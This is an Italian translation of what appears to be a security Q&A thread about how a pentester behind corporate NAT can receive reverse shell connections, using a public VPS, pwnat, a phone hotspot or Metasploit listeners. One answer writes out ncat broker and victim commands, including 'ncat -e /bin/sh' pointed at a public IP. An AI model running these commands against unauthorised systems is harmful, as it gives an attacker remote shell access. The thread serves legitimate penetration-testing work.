Installazione di Kali Linux per le connessioni della shell inversa su Internet

4

Sto eseguendo Kali Linux come una VM sulla mia macchina Windows che è NAT'd dietro la mia rete aziendale, se voglio testare un sito web per un cliente e credo che sia possibile una shell inversa, che cosa è un buon modo di raggiungere la connessione?

Si noti che non sto chiedendo come eseguire l'exploit o iniettare lo shellcode, ma sto chiedendo un modo semplice per il mio netcat locale di ascoltare su un indirizzo IP pubblico.

I miei pensieri finora:

  • Tunnel VPN / SSH su un server per fornirmi una connessione Internet diretta a cui Kali VM può connettersi e utilizzo l'indirizzo IP pubblico di questa connessione per la mia shell inversa.
  • Porta avanti dalla connessione Internet della mia azienda alla mia VM (non è una buona soluzione se sono richieste più porte su più protocolli).
  • Imposta una DMZ sulla mia Kali VM - ancora una volta non una buona soluzione su una rete aziendale.
  • Esegui Kali dal cloud . Tuttavia, questo significherebbe mantenere la mia VM locale così come la versione cloud, e anche Amazon dovrebbe essere informato di qualsiasi penetrazione prova in anticipo .
posta SilverlightFox 17.03.2014 - 15:40
fonte

3 risposte

1

Potresti configurare pwnat ma hai bisogno del controllo di entrambe le parti per negoziare la perforazione UDP. Ora voglio un pazzo sviluppatore MSF per aggiungere questa funzionalità a Meterpreter. Tecniche simili includono strumenti come matahari (o, più vecchio, pbounce) e reti particolari come iodio (DNS) o onioncat (nodi Tor).

Se fossi in te, il mio telefono sarebbe un hotspot rapido e potrebbe essere utilizzata una sorta di DNS dinamico. Quindi, la perforazione è in gran parte non necessaria e così ci sono molti altri elementi a cui alludi nella tua domanda come IaaS, regolamenti, due diligence, semplicità, ecc. Se disponi di una connessione cablata con copia copiale insieme alla connessione WiFi, puoi trovarti su entrambe le reti contemporaneamente.

    
risposta data 23.03.2014 - 18:55
fonte
0

Puoi farlo con ncat su un terzo computer pubblicamente accessibile (io uso il mio server AWS):

ncat --broker <port>

Macchina d'attacco:

ncat <public IP> <port>

Macchina vittima:

ncat -e /bin/sh <public IP> <port>
    
risposta data 03.04.2016 - 20:51
fonte
0

La soluzione migliore è eseguire qualsiasi macchina Linux con un indirizzo IP pubblico come un VPS, una macchina AWS o anche un server che utilizzi solo per il pentesting.

Da qui puoi eseguire gli ascoltatori metasploit e / o ncat. È più semplice se il firewall e l'iptables sono disabilitati.

Metasploit può essere eseguito localmente ma con l'host inverso impostato sulla macchina basata su Internet o interamente sulla macchina basata su Internet. Un'altra opzione potrebbe essere quella di SSH sulla macchina e di inoltrare le porte se si desidera eseguire qualcosa localmente.

Una cosa da notare è che per gli attacchi a pentesting è probabilmente indesiderabile utilizzare bind shell poiché esiste sempre la possibilità che un malintenzionato possa connettersi e prendere il controllo a meno che non venga utilizzata una forma efficace di controlli di accesso per la shell.

    
risposta data 27.12.2018 - 13:00
fonte

Leggi altre domande sui tag